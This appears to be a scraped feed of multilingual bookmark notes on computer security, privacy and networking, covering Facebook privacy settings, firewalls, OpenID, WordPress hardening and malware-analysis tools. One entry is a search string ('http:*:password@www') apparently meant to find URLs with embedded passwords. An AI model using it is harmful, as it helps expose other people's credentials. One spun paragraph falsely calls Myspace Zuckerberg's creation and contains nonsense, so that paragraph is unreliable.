Windows only: Free application Axence NetTools is a comprehensive suite of networking tools for your PC, including a network scanner, inbound/outbound connection monitor (NetStat), port scanner, and other network and bandwidth measuring tools. NetTools is very similar in ways to previously mentioned network monitors like Look@Lan, but if you want to get elbow deep in your network, it's another great option to add to your toolbox. Axence NetTools is a free download, Windows only.

URL監視できる。

これはよさげ

livedoorのサーバ監視サービス、無料

2008年9月8日 データホテルパトロール OPEN データセンターを運営しているライブドアが、無償のサーバ監視サービスを開始 特別なソフトウェアのインストールが必要ないので、今すぐ簡単にサーバ監視が始められます。

Klaus Matzka and his teenage son Loris took several photographs of some of the city's sights, including the famous red double-decker buses… But the tourists have said they had to return home to Vienna without their holiday pictures after two policemen forced them to delete the photographs from their cameras in the name of preventing terrorism.

Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London. By Matthew Weaver and Vikram Dodd, guardian.co.uk, Thursday 16 April 2009 12.53 BST

Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London

Jenny Jones, a member of the Metropolitan Police Authority and a Green party member of the London assembly, said she would raise the incident with the Met chief, Sir Paul Stephenson, as part of discussions on the policing of the G20 protests. "This is another example of the police completely overreaching the anti-terrorism powers," she said. "They are using it in a totally inappropriate way. "I will be raising it with the commissioner. I have already written to him about the police taking away cameras and stopping people taking photographs and made the point that if it was not for people taking photos, we would not know about the death of Ian Tomlinson or the woman who was hit by a police officer." More out of control policing.

"Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London." Sigh.

To prevent tourism?

Go to Number 3 for how to delete your FB account

Mac backups, insurance and recovery software.

Firestarter is a friendly graphical interface that allows you to configure a software firewall in Linux using the built-in IPtables/IPchains utilities. It is an open source GUI firewall program. The software aims to combine ease of use with powerful features, therefore serving both Linux desktop users and system administrators.

firewall

"This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following"

this seems a lot harder than it should be.

(Jokinen Juuso, ryhmä 23) Dan Yoder kertoo 10 syytä miksi kannattaa poistaa poistaa oma Facebook -tili. Syyt ovat aikalaila samoja, kuin mitä lehdistö on Suomessakin aika-ajoin väläytellyt. Yksityisyydensuoja, Mark Zuckerberg:n historia salasanojen varastelijana ynnä muita. Valitsin tämän aiheen koska se on ajankohtainen. Facebookista on aika-ajoin haukkuja lähes joka mediassa. Jopa siinä itsessään. En itse pelkää yksityisyydensuojaani muulla tavoin, muutenkuin niin että joku toinen julkaisee kuvan jossa en ole otoisimmillani. Se etten olisi Facebookissa ei estä ketään tekemästä niin. Kun olen Facebookissa voin tarkkailla siellä minusta näkyvää sisältöä. Tekstissä arvostellaan myös, että facebook myy tietojani mainostoimistoille. Toisaalta mainostoimistot käyttävät tietojani saadakseen parhaat mahdolliset mainokset minulle. Mieluummin katson FB-sivujeni reunalla minulle mielenkiintoisia mainoksia, kuin esimerkiksi vanhojen naisten alusasujen mainoksia.

I'm really close...

I'm rocking #facebook but if you are unsure, read this -> http://ow.ly/1HhST and then to delete your account go here -> http://ow.ly/1HhTW

Here are some of our tips for keeping your WordPress website or blog more secure and less susceptible to malicious attacks.

Facebook is a dangerous place to have a profile on - not because of maurading online predators, but because you don't know where you stand with it as a company. This research from the EFF proves that they are happy to re-jig their privacy rules in order make money from their users.

psyb0t

@AlohaArleen Could it be the current worm? http://is.gd/otVx [from http://twitter.com/dc0de/statuses/1373557182]

You are only vulnerable if: * Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device. * Your device also has telnet, SSH or web-based interfaces available to the WAN, and * Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable. As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

Facebook is moving people to their new 'Connections'. And it appears that your privacy settings have been dumped in the process.

This #Facebook lack of #privacy stuff is REALLY concerning me http://bit.ly/9nnk4j

Facebook's creepy new privacy settings

In this third post of the series, I’ll talk about using dynamic ACLs: How to store an ACL in a database, and construct it from there when needed. This post builds on the things introduced in part 1 and part 2.

自由自在にMACアドレスを変更

If you must bring a laptop ...

These days, we Geeks don’t travel anywhere without our laptops . It’s a given that we need to have them on us! How would we survive?! Thankfully, Seth sent in the following tips to help us keep them safe while we are on the road.

% ha-gen -f ~/Documents/awesome_words.txt

Generador de passwords friendly. Hay otras alternativas como flapcore.

Password generator that attempts to use words that are more rememberable.

closedcrkt@gmail.com After 2 days have passed, this alias will be

Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers. In the future it might also run Windows apps.

crazy, run each app on the desktop in it's own VM, isolate the networking stack in a VM, etc.

An entirely different approach to security: isolate. A lot. Not sure if this will completely work against common exploits

Die technische Basis dafür liefern bestehende Open-Source-Projekte wie Xen, Linux und das X Window System, die Joanna Rutkowska und ihr Kollege Rafal Wojtczuk unter anderem mit einer sicheren, grafischen Oberfläche versehen haben. Sie soll auch Copy und Paste zwischen den VMs ermöglichen.

To do with privacy .read

LastPass info from Lifehacker

With all the privacy issues surrounding Facebook, many people are considering quitting the site altogether. If you're not ready to take it that far, here's how to avoid the privacy breaches without completely deleting your account and losing touch with your friends.

how to be Google.

"http:*:password@www" bangbus

Zuckerberg and gang may think that they know what’s best for society, for individuals, but I violently disagree. I think that they know what’s best for the privileged class. And I’m terrified of the consequences that these moves are having for those who don’t live in a lap of luxury.

Interesting insight from female scholar

Must read: Facebook and “radical transparency” (a rant) by researcher Danah Boyd http://j.mp/9EjHul – Jean-Luc Raymond (jeanlucr) http://twitter.com/jeanlucr/statuses/14000875802

Privacy scanner for FB

This website provides an independent and open tool for scanning your Facebook privacy settings.

Facebook Privacy Scanner http://www.reclaimprivacy.org/

http://www.reclaimprivacy.org/ Facebook privacy scanner online ! Controleer je facebookinstellingen ! – Samir Allioui (SamirAllioui) http://twitter.com/SamirAllioui/statuses/14174960709

brilliant review (and comments) on Shirky's "Here comes Everybody

"Coase, who won the 1991 Nobel Prize in Economics, answered the question by noting a market's transaction costs: buyers and sellers need to find one another, then reach agreement, and so on. The Coase theorem implies that if these transaction costs are low enough, direct markets of individuals make a whole lot of sense. But if they are too high, it makes more sense to get the job done by an organization that hires people. What's new is something consultant and social technologist Clay Shirky calls "Coase's Floor," below which we find projects and activities that aren't worth their organizational costs -- things so esoteric, so frivolous, so nonsensical, or just so thoroughly unimportant that no organization, large or small, would ever bother with them. Things that you shake your head at when you see them and think, "That's ridiculous." Sounds a lot like the Internet, doesn't it?"

Review of Clay Shirky's book, with useful new insights in the first couple of paragraphs.

In 1937, Ronald Coase answered one of the most perplexing questions in economics: if markets are so great, why do organizations exist? Why don't people just buy and sell their own services in a market instead? Coase, who won the 1991 Nobel Prize in Economics, answered the question by noting a market's transaction costs: buyers and sellers need to find one another, then reach agreement, and so on. The Coase theorem implies that if these transaction costs are low enough, direct markets of individuals make a whole lot of sense. But if they are too high, it makes more sense to get the job done by an organization that hires people.

"[Clay Shirky's] new book, Here Comes Everybody: The Power of Organizing Without Organizations, explores a world where organizational costs are close to zero and where ad hoc, loosely connected groups of unpaid amateurs can create an encyclopedia larger than the Britannica and a computer operating system to challenge Microsoft's."

RT @chrisguillebeau: Wired: Army Orders Bases to Stop Blocking Twitter, Facebook, and other social networking sites - http://bit.ly/y9kle [from http://twitter.com/gvillearchitect/statuses/2112505130]

Army unblocks social media tools

"...a click in the right direction for the armed service which seems to be making a slow but steady recovery from its lingering hostility towards social media."

The Army has ordered its network managers to give soldiers access to social media sites like Facebook, Flickr, and Twitter, Danger Room has learned. That move reverses a years-long trend of blocking the web 2.0 locales on military networks. Army public affairs managers have worked hard to share the service’s stories through social sites like Flickr, Delicious and Vimeo. Links to those sites featured prominently on the Army.mil homepage. The Army carefully nurtured a Facebook group tens of thousands strong, and posted more than 4,100 photos to a Flickr account. Yet the people presumably most interested in these sites — the troops — were prevented from seeing the material. Many Army bases banned access to the social networks.

Recover Data Like a Forensics Expert Using an Ubuntu Live CD

Conclusion

An emerging field called collective intelligence could create an Orwellian future on a level Big Brother could only dream of.

The success of Google, along with the rapid spread of the wireless Internet and sensors — like location trackers in cellphones and GPS units in cars — has touched off a race to cash in on collective intelligence technologies.

collective intelligence

“The new information tools symbolized by the Internet are radically changing the possibility of how we can organize large-scale human efforts,” said Thomas W. Malone, director of the M.I.T. Center for Collective Intelligence. “For most of human history, people have lived in small tribes where everything they did was known by everyone they knew,” Dr. Malone said. “In some sense we’re becoming a global village. Privacy may turn out to have become an anomaly.”

network findings in an easy-to-grasp manner, and can be expanded to show you more than just names and addresses. Weighing in at less than 1MB, it makes a great addition to any thumb drive, especially for anyone often called upon to figure out what's up with the router. Check out some of SoftPerfect's deeper options and offerings below. After grabbing and installing the stand-alone executable, you'll see that SoftPerfect can do some pretty basic system-finding and exploration. Head to "Options" and choose "Auto Detect Local IP Range" to save yourself the typing. On most home networks, if you're prompted for an interface choice, pick the one that starts with 192.168. Hit "Start scanning," and you're off. If SoftPerfect finds a shared folder, you can right-click it to open Windows' native explorer view or map it to a virtual letter drive. Right-clicking a computer icon offers you wake-on-LAN sleep/wake-up options, along with HTTP, FTP, and Telnet connection. Where are the MAC addresses,

Google Abandons Standards, Forks OpenID http://ow.ly/1NncJ

well they're not Microsoft but well on their way

Connecting Ideas

OpenID

allow you to actually work normally on your desktop. All network traffic going out of your machine will be allowed out, but all TCP/IP traffic coming into your m

Mastering iptables could take a while, but if you have a few rules to cover the basic security needs, you’ll be well on your way to protecting your Linux system. Jack Wallen explains some key rules to get you started.

Palin E-Mail Hacker Says It Was Easy

Email hacking is taken too far.

Palins e-mail was hacked into not with expert knowledge of computer systems, but rather a well thought out trick to recover her account password. This just goes to show information is power. People can find personal information on many other people in the world. If this information gets into the wrong hands, there are ways to it may be used against you.

"hacker" said it was easy. Haha.

日本語サポートが必要な場合は、サーバの台数が多ければSECOM、携帯対応を重視する場合はジオトラストがよいのかも。

http://lifehacker.com/5544200/top-10-privacy-tweaks-you-should-know-about

With all the talk lately about Facebook's flawed privacy systems, it's a good time to consider what you're making available elsewhere on the web and on your system. These 10 settings tweaks and setups make your web life a little less public.

通常、ブラウザには「履歴を削除する機能」が備わっていて、ブラウザの履歴を削除すればあなたの悪行の数々は消え去ってくれるように思えます。 しかし、ブラウザからは消せない履歴が残っているのです…

「~/Library/Preferences/Macromedia/Flash Player/#SharedObjects/ランダムなハッシュ/」の場所に Flash の Local Shared Object（Cookieみたいなもの）が保存されるので、サイトの訪問履歴が残されてしまう。

There was an interesting article recently in The New York Times about getting locked out of a Gmail account. In August, blogger Alan Shimel of StillSecure wrote about his problems regaining access to a Yahoo e-mail account. Suffice it to say that if someone learns your Web mail password, it's a very difficult situation--one that may not end well. For one thing, the Web mail provider may not know enough about you to determine the true account owner. Worse still, anyone using a free Web mail account from Google (Gmail), Yahoo, or Microsoft (Hotmail) can't expect to talk to a human being to resolve a problem with their account. Talking to person at Google requires a subscription to Google Apps Premier Edition for $50 a year. Microsoft and Yahoo similarly offer telephone support only to "premium" customers. If you care about a Web mail account, then some homework may be in order. Alternate e-mail address One thing Web mail users should have associated with their account is an alternat

The Fortress. The Underground Fortress is an 8th wonder of the world! It is an unbelievable feat of engineering. The Fortress goes a total of 45 feet under the house! That is below sea level! The fortress has over 1600 sq. ft. of living area, plus hundreds of more square feet of passages and secrets rooms. It was all hand dug over a 20 year period, and all the walls were constructed with a small electric hand cement mixer. There are 3 ft concrete walls, using 5-bag cement (20% denser than regular cement). Not only are the walls thick and dense, but the finishing work is amazing quality. These walls keep it a constant 60F degrees year round. It is so well insulated that even one small space heater can heat all 1600+ sqft of fortress space in a few hours. The fortress has amazingly fresh air in it with an incredible air ventilation system that pulls air outside and brings fresh air in, leaving no moldy or musty smell that you commonly smell in basements.

The Fortress goes a total of 45 feet under the house! That is below sea level! The fortress has over 1600 sq. ft. of living area, plus hundreds of more square feet of passages and secrets rooms. It was all hand dug over a 20 year period, and all the walls were constructed with a small electric hand cement mixer. There are 3 ft concrete walls, using 5-bag cement (20% denser than regular cement). Not only are the walls thick and dense, but the finishing work is amazing quality.

Everything having

"The Underground Fortress is an 8th wonder of the world! It is an unbelievable feat of engineering. The Fortress goes a total of 45 feet under the house! That is below sea level! The fortress has over 1600 sq. ft. of living area, plus hundreds of more square feet of passages and secrets rooms. It was all hand dug over a 20 year period, and all the walls were constructed with a small electric hand cement mixer." Full of survival gear, nitrogen-sealed food supplies, etc.

<GeDaMo> Use mmap rather than malloc if you want memory with nx disabled: http://androidbutnotparanoid.blogspot.com/2009/05/dynamically-generating-and-executing.html

Computer programs can generate machine code in memory and then execute it. This is the case with Sun's Java Hotspot VM, which dynamically compiles Java bytecode to native code to increase the VM's performance. Several exploits are based on buffer overflows to remotely inject machine code into memory and then jumping into it. Google released it's Chrome web browser featuring the V8 Javascript Engine, which greatly improved Javascript's performance by compiling Javascript to native code.

Adds a virtual keyboard to text fields, password fields and textareas allowing keyboardless input of text and special characters. Install the script and double-click on one of the form element types above to display the keyboard.

Adds a virtual keyboard to text fields, password fields and textareas allowing keyboardless input of text and special characters. Install the script and double-click on one of the form element types above to display the keyboard.

to get around keylogging, keyloggers

url shortener

Awesome new URL shortener, http://www.trick.ly/ allows you to set a password question to gain access to the long URL, perfect for fact tests

How to make URLs short and password protected

Features: * Secure and enhance performance to your Terminal Server and workstations by preventing execution of chosen applications. * Prevent access to any application by executable filename. * Freeware!

page

bloquea aplicaciones de windows

Instantly and easily lock access to applications in any environment - Utilidad gratuita para bloquear la ejecución de aplicaciones

# Secure and enhance performance to your Terminal Server and workstations by preventing execution of chosen applications. # Prevent access to any application by executable filename. # Freeware!

Hay algunos programas que, por más que queramos, no podemos desinstalar (¿alguien dijo Internet Explorer en el fondo?). Sin embargo, podemos hacer todo lo posible por ignorar su existencia. Una de estas medidas es bloquear su ejecución, así no se nos abren accidentalmente, ni por asociación con un tipo de archivo en especial. Para hacerlo de forma fácil, contamos con programas como Application Locker, una aplicación gratuita para Windows. El programa cuenta con una lista pre-determinada de programas a bloquear (por eso tal vez vean algunos que no tienen instalados), pero también pueden agregar sus propios programas. Además de evitar que corran los que no quieren, pueden usar esta herramienta para, por ejemplo, evitar que los niños les usen Firefox o el MSN, o mantenerlos fuera del alcance durante las horas de trabajo (un poco de ayuda a la auto disciplina).

The Google team's paper (Under)mining privacy in social networks (pdf) will be presented at the Web 2.0 Security and Privacy 2009 meeting in May. Tom Simonite, online technology editor

One of my all time favourite hacks... this has become such an iconic figure

if not for our future career aspirations, this is totally something we would try.

I love dork humor.

This is funny. Now it won't happen again. Pitty. Sorry for the news source, i know they aren't the best. Hey it is still a funny article

Create, access, or delete hidden folders. Download Houdini for the Mac from MacUpdate.com.

As recently as a month ago I was a victim of a state of mind I call Analytics Dismissal Disorder. This mindset is common after hearing about the importance of analytics, installing the tracking code and then getting overwhelmed by all of the graphs and scary numbers. When I suffered from analytics dismissal disorder (which my doctors called A.D.D. for short), I knew Google Analytics was important but avoided the extra effort necessary to learn how to get the most out of the software. This post explains what I needed to learn to get over this.

$clean_message = strip_tags($_POST['txtComment']);

8!!! different malware/virus apps in one go!!! useful for when the shit hits the fan...

Free application Hitman Pro scans your system for malware using not one, not two, but eight different anti-malware applications. Essentially, Hitman Pro is a helper utility that runs up to eight different cleaning tools when you tell it to.

Windows only: Free application Hitman Pro scans your system for malware using not one, not two, but eight different anti-malware applications. Essentially, Hitman Pro is a helper utility that runs up to eight different cleaning tools when you tell it to. Some are favorites we all know and love, like Ad-Aware and Spybot S&D, while others are a bit more obscure. The idea behind Hitman Pro is that you've got a one-stop shop for killing off any malware that hits your system—regardless of whether it's spyware, adware, or some nasty virus. As the MakeUseOf post points out, scanning your system with each app can be a time-consuming process, so it's best to use when your computer is idle. If Hitman Pro seems like overkill, check out our five best antivirus applications and five best Windows maintenance tools for some great alternatives.

the cutting edge of Lego safe technology...

def test_get_new_with_http_should_redirect_to_ssl @request.env['HTTPS'] = nil get :new assert_redirected_to "https://" + @request.host + @request.request_uri end

@request.env['HTTPS'] = 'on'

Here’s a quick tip for how to test that your application is using SSL correctly.

Chrome process model

pending sect. 2 & 3

An interesting list of things that can not be seen on google maps

If terrorists were looking for potential targets, they now have a nice list...

AddOutputFilterByType DEFLATE text/html text/plain text/xml

.htaccess is a file with a power to override certain configurations in the Apache httpd.conf file. If you’re using shared hosting, then you don’t have access to Apache main configuration. So most of shared hosting will provide you with .htaccess file.

RT @cameronolivier: The What, Why, When & How of .htaccess http://bit.ly/xJLWO [from http://twitter.com/bkuri/statuses/1370101751]

@caryblack Makes me paranoid. http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Tabnabbing: A New Type of Phishing Attack - via @dustice http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

.

Good general guidelines for wireless router setup.

Dear Lifehacker,I just moved into my first apartment, and bought my first Wi-Fi router. It's a standard Linksys "blue box," and seems to work fine, but I'm wondering&mdash;are there any settings I should be looking to change?

How difficult is it to deleted your social networking account? in some cases very and in others imposible

[...] we’ll take a look at the account deletion processes of popular websites and services, and how easy or difficult they make it. Then we’ll discuss why sites make things so complicated, and some things to consider when designing your own deletion policies.

Poderá ser util, um dia, quem sabe?

on Facebook

Herramienta para conocer el nivel de privacidad de tu cuenta en Facebook

Servizio per valutare la privacy delle proprie informazioni su Facebook

Check your Facebook privacy

The issue with Facebook's latest change is not that they force you to link your interests without permission, but rather that they remove an option to express yourself on the profile without links. As we noted, Facebook users now face a Hobson's choice between the new Connections and no listed interests at all. As Facebook explains, "If you didn't connect to any of the suggestions, the sections of your profile to which those suggestions corresponded will now be empty." (The transition tool also allows you to delay the choice by saying 'Ask Me Later'). Previously, you could list interests in your profile without linking; after the transition, you cannot. You do have options to adjust visibility on the profile page, for which we commend Facebook, but nevertheless, this is not a true opt-out because the all the "Facebook Pages you connect to are public."

An ordinary human is not going to look through the list of Facebook's millions of cooking fans. It's far too large. Only data miners and targeted advertisers have the time and inclination to delve that deeply.

"Once upon a time, Facebook could be used simply to share your interests and information with a select small community of your own choosing. As Facebook's privacy policy once promised, "No personal information that you submit to Facebook will be available to any user of the Web Site who does not belong to at least one of the groups specified by you in your privacy settings.""

OK right @librarianbyday link: RT @mikebutcher: Outside sites "Instant personalisation" via Facebook is opt out, not in http://bit.ly/cWleqW – Nicola Osborne (suchprettyeyes) http://twitter.com/suchprettyeyes/statuses/12668465502

"Google is phasing out the internal use of Microsoft’s ubiquitous Windows operating system because of security concerns, according to several Google employees."

The problem is two-fold. technology and person. switching to a more secure operating system doesn't fully shield you from some idiot clicking on a url from an IM chat

Google is phasing out the internal use of Microsoft’s ubiquitous Windows operating system because of security concerns, according to several Google employees. The directive to move to other operating systems began in earnest in January, after Google’s Chinese operations were hacked, and could effectively end the use of Windows at Google, which employs more than 10,000 workers internationally.

Internal directive follows China hacking

quote:Employees said it was also an effort to run the company on Google’s own products, including its forthcoming Chrome OS, which will compete with Windows. “A lot of it is an effort to run things on Google product,” the employee said. “They want to run things on Chrome.” The hacking in China hastened the move.

Google is phasing out the internal use of Microsoft’s ubiquitous Windows operating system because of security concerns, according to several Google employees.

Avoiding proxy use for cross-domain ajax request, easier than you thought.

A couple of years ago, web developers were banging their head against the first wall in Ajax: the same-origin policy. While we marveled at the giant step

A 'Captcha' is a challenge-response test most often placed within web forms to determine whether the user is human or a spam bot.

Kennt ihr den Unterschied zwischen Malware, Viren, Trojanern, Würmer? Die Aufklärung: http://j.mp/amsdhQ – Sergej Müller (wpSEO) http://twitter.com/wpSEO/statuses/16762701185

2 lines of HTML code make your domain map to an openid provider... meaning you can type $DOMAIN_NAME into an openid space and not (gmail|yahoo|etc)

OpenID is an open standard for logging onto various web services with a single digital identity. The tool puts your online identity back in your hands&mdash;and as it turns out, OpenID on your own domain is surprisingly easy.

lifehacker.com: Setting up OpenID thru your own domain

Find the Person Behind an Email Address

Reverse Email Search

Weg met de captcha's met afbeeldingen http://textcaptcha.com/ #accessibility #textcaptcha

"This site provides a web service to generate text-based CAPTCHAs, based on simple logic questions."

Text Captcha is an accessible alternative to standard captcha methods and relies on logic.

If you're going to use Facebook, you should definitely know how to keep your information private.

Myspace is a social media site that is operated and drunk driving charge possessed. The positioning ended up being started by simply Mark Zuckerberg any time he or she had been the basic university student at Harvard as well as grew swiftly to incorporate hundreds of millions involving people

But if you're going to use Facebook, you should definitely know how to keep your information private.

Worried about Facebook privacy but still want to keep your account? A visual guide to how to lock it down. http://bit.ly/aHcihN

You'll never quit. So protect yourself.

How To Set Your Privacy settings in Facebook - FB really, really made it hard to impossible.... ¦ http://bit.ly/bARi1x

JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily. Examples of idiotic stuff you might want to block: tynt.com - modifies copy-pasted text intellitxt.com - green links with double-underlines snap.com - link previews

JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily.

"JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily." Better version of the tynt-blocker extension I linked to before.

JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily. Here are some examples of common annoying scripts. JavaScript Blacklist comes pre-configured to block these by default. * tynt.com - modifies copy-pasted text * intellitxt.com - green links with double-underlines * snap.com - link previews

Allows you to turn off annoying scripts.

Safari JavaScript Blacklist - JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from ... http://ow.ly/17K9ef – Javascript News (del_javascript) http://twitter.com/del_javascript/statuses/16212314408

Top 45 Wordpress Plugins & Tools For The Administration Area | Design your way - http://www.designyourway.net/blog/resources/top-45-wordpress-plugins-tools-for-the-administration-area/

45 สุดยอดปลั๊กอินสำหรับหน้า Admin Wordpress

huge list of useful plugins for WP admins

10 Useful WordPress Security Tweaks - Smashing Magazine

Several tips for using .htaccess and plugins to deny malicious scripts, dir browsing, etc.

Security has always been a hot topic. Offline, people buy wired homes, car alarms and gadgets to bring their security to the max. Online, security is important, too, especially for people who make a living from websites and blogs. In this article, we’ll show you some useful tweaks to protect your WordPress-powered blog.

以下の一覧にまとめ。。。 * インジェクション * クロスサイト・スクリプティング * セッション・ハイジャック * アクセス制御や認可制御の欠落 * ディレクトリ・トラバーサル (Directory Traversal) * CSRF（クロスサイト・リクエスト・フォージェリ）

RT @joacim_boive: Google Code University: Web Application Exploits and Defenses http://bit.ly/hacking_web

You've got to hand it to Facebook. They certainly know how to do security -- not. Today I was tipped off that there ...

the first cyborg is now the first infected cyborg. TOI esque headline on BBC http://news.bbc.co.uk/2/hi/technology/10158517.stm [from http://twitter.com/madguy000/statuses/14764804819]

Encrypted VOIP and SMS for Android phones.

crypto apps for the Android phone: voip and secure text

RedPhone provides end-to-end encryption for your calls, securing your conversations so that nobody can listen in. It's easy to use, and functions just like the normal dialer you're accustomed to. RedPhone uses your normal mobile number for addressing, so there's no need to have yet another identifier or account name; if you know someone's mobile number you know how to call them using RedPhone. And when you receive a RedPhone call your phone will ring just like normal, even if it is asleep.

From day one, Mark Zuckerberg wanted Facebook to become a social utility. He succeeded. Facebook is now a utility for many. The problem with utilities is that they get regulated

Brilliant insight. RT @jangles: More on Facebook: reading @zephoria 's thought-provoking "Facebook is a utility" http://is.gd/cb5ij [from http://twitter.com/PaulSweeney/statuses/14083869118]

"Facebook speaks of itself as a utility while also telling people they have a choice. But there’s a conflict here. We know this conflict deeply in the United States. When it comes to utilities like water, power, sewage, Internet, etc., I am constantly told that I have a choice. But like hell I’d choose Comcast if I had a choice. Still, I subscribe to Comcast. Begrudgingly. Because the “choice” I have is Internet or no Internet. I hate all of the utilities in my life. Venomous hatred. And because they’re monopolies, they feel no need to make me appreciate them. Cuz they know that I’m not going to give up water, power, sewage, or the Internet out of spite. Nor will most people give up Facebook, regardless of how much they grow to hate them."

"I hate all of the utilities in my life. Venomous hatred. And because they’re monopolies, they feel no need to make me appreciate them. Cuz they know that I’m not going to give up water, power, sewage, or the Internet out of spite. Nor will most people give up Facebook, regardless of how much they grow to hate them."

Facebook & Radical Transparency http://bit.ly/9eVJMe, a rant by @zephoria, with a follow-up http://bit.ly/b69GjU [from http://twitter.com/CircleReader/statuses/14075940793]

Como verificar si tu contraseña es segura

It would take About 700 million years for a desktop PC to crack your password

Good reminder RT @MR21c How to Return Facebook Privacy Settings to What You Signed Up For http://bit.ly/d7VapU via @lifehacker

"Online privacy expectations are evolving, but whether Facebook likes it or not, a lot of us want the privacy settings we signed up for when we joined the service. Here's how to use Facebook's new privacy controls to regain your original privacy."

Want to easily see public status updates on Facebook? See OpenBook: http://bit.ly/dsvSnT (I recommend "drunk prom") Le sigh. – danah boyd (zephoria) http://twitter.com/zephoria/statuses/14126705736

RT @zephoria: Want to easily see public status updates on Facebook? See OpenBook: http://bit.ly/dsvSnT (I recommend "drunk prom") Le sigh.

open graph + "s="

There's a new Facebook search site out there with a concept similar to PleaseRobMe, a site that demonstrates just how easy it is for bad guys to use social networking crap to tell when you're away from your home. This new Facebook Search allows anyone to search for potentially embarrassing updates that can now be viewed by the public.

Facebook Status Search

apache設定tips。

memo

意味ねー。バージョン隠すくらいならちゃんとアップデートしろ。まぁ少し帯域が節約できるというメリットはあるが。

httpd.conf view source print? 01 # 持続的接続を有効化 02 KeepAlive On 03 # IE は除外 04 SetEnvIf User-Agent ".*MSIE.*" \ 05 nokeepalive ssl-unclean-shutdown \ 06 downgrade-1.0 force-response-1.0 07 # HTTP ヘッダの表示を抑制 08 ServerTokens Prod 09 # エラーページの表示を抑制 10 ServerSignature Off 11 # TRACE メソッドを無効化 12 TraceEnable Off php.ini view source print? 1 ; HTTP ヘッダの表示を抑制 2 expose_php = Off

The single easiest way to keep your kids safe online — and away from adult websites — on your home Internet for free. No software to install.

filtro de webs por dns

Filtro Familiar

free to block adult web content and phishing sites

filtrado de contenidos en dns

The single easiest way to keep your kids safe online — and away from adult websites — on your home Internet for free. No software to install.

filtro de webs por dns

Filtro Familiar

free to block adult web content and phishing sites

SSL is not expensive

Thanking @ginatrapani

OpenID

using Google.

For some reason I was under the mistaken impression that setting up an OpenID on my own domain, ginatrapani.org, would be a big hassle: that I'd have to host my own OpenID server software and that it would take all sorts of installation and maintenance BS to do so. I feel strongly about owning my identity online, mapping it to my nameplate domain, and actively choosing an authorizing party instead of just accepting the sign-in service du jour like Facebook, Twitter, Yahoo, or Google. Still, I never got set up with OpenID on ginatrapani.org because my perceived hassle factor was daunting. Instead, I used idproxy.net for my OpenID and put the domain setup on my "someday I have to do that" list. It meant that my OpenID was ginatrapani.idproxy.net instead of my own domain. Idproxy is a great service and I thank them for getting me started with OpenID; but still, I want my OpenID URL to be a domain name I own and control.

Profiles as an OpenID provider and to Chris for a great discussion of OpenID, OAuth, and verifying identity on the web.

Thanking @ginatrapani

OpenID

using Google.

I thought I had done enough to reasonably privatize my Facebook settings... this video showed me a couple things I had missed.

Here's everything you need to know to go back to the old days when you could control your privacy on Facebook with just a few clicks.

how nytimes surfaces complex graphics in articles

Which is longer: Facebook privacy policy or the US Constitution?

If you guessed the latter, you’re right. Facebook’s Privacy Policy is 5,830 words long; the United States Constitution, without any of its amendments, is a concise 4,543 words.

how nytimes surfaces complex graphics in articles

Which is longer: Facebook privacy policy or the US Constitution?

If you guessed the latter, you’re right. Facebook’s Privacy Policy is 5,830 words long; the United States Constitution, without any of its amendments, is a concise 4,543 words.

I used to love Facebook. I was in law school at Wisconsin when it launched, and everyone I knew on the site was basically a peer -- people who I'd known well or at least met in person at some point. Then... I graduated. Suddenly having a Facebook account full of pictures from blurry nights in Madison and Pulitzer Prize-caliber dirty jokes from my friends wasn't so awesome anymore -- especially once I started working for Engadget and lots and lots of people I didn't actually know (or, somewhat even worse, only knew professionally) started looking at my personal page. So I needed a system -- a way to still use Facebook to share personal stuff with friends, professional stuff with colleagues, and awesome stuff with everyone, all without blurring any lines or accidentally sharing too much with people I don't know.

I used to love Facebook. I was in law school at Wisconsin when it launched, and everyone I knew on the site was basically a

クローラーの話。botやクローラーを作るときに。

クローラーをどう実装すべきか、クローラーにどう対処すべきか。

A Ubuntu-based GNU/Linux distribution targeted on analyzing malware.

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.

Top Secret America (Washington Post)

One of the best uses of Flash to display data that I've ever seen.

REMnux

A Ubuntu-based GNU/Linux distribution targeted on analyzing malware.

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

Questi sono alcuni dei risultati di un'inchiesta portata avanti per due anni dal Washington Post. Dice @riotta su twitter che non ci sono scoop, però.

Great piece of journalism from Washington Post: Top Secret America, A hidden world, growing beyond control. http://is.gd/dyx7L #Terrorism

Interesting.

The top-secret world the government created in response to the terrorist attacks of Sept. 11, 2001, has become so large, so unwieldy and so secretive that no one knows how much money it costs, how many people it employs, how many programs exist within it or exactly how many agencies do the same work.

tl;dr Government is too big.

